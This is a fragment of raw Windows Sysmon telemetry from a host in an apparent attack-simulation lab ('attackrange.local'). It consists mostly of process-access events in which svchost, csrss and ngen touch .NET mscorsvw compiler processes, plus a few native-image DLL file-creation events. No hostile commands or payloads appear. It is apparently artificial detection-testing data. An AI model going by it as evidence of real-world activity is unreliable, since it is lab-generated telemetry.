13:48:21.576{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.560{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.560{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.513{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E602-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.513{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E602-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.513{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E602-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:21.420{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c60-0\System.WorkflowServices.dll2021-01-18 13:48:21.420 10341000x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.591{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.576{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.576{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.482{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-ED02-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.482{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-ED02-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.482{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-ED02-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:22.420{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1340-0\UIAutomationClient.dll2021-01-18 13:48:22.420 10341000x80000000000000007149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.060{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.060{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.060{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.998{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-EB02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.998{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-EB02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.998{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-EB02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.982{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F302-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.982{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F302-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:23.919{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\58c-0\UIAutomationTypes.dll2021-01-18 13:48:23.919 10341000x80000000000000007170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.623{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.623{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.591{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F102-00000000A301}3812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.576{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F102-00000000A301}3812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 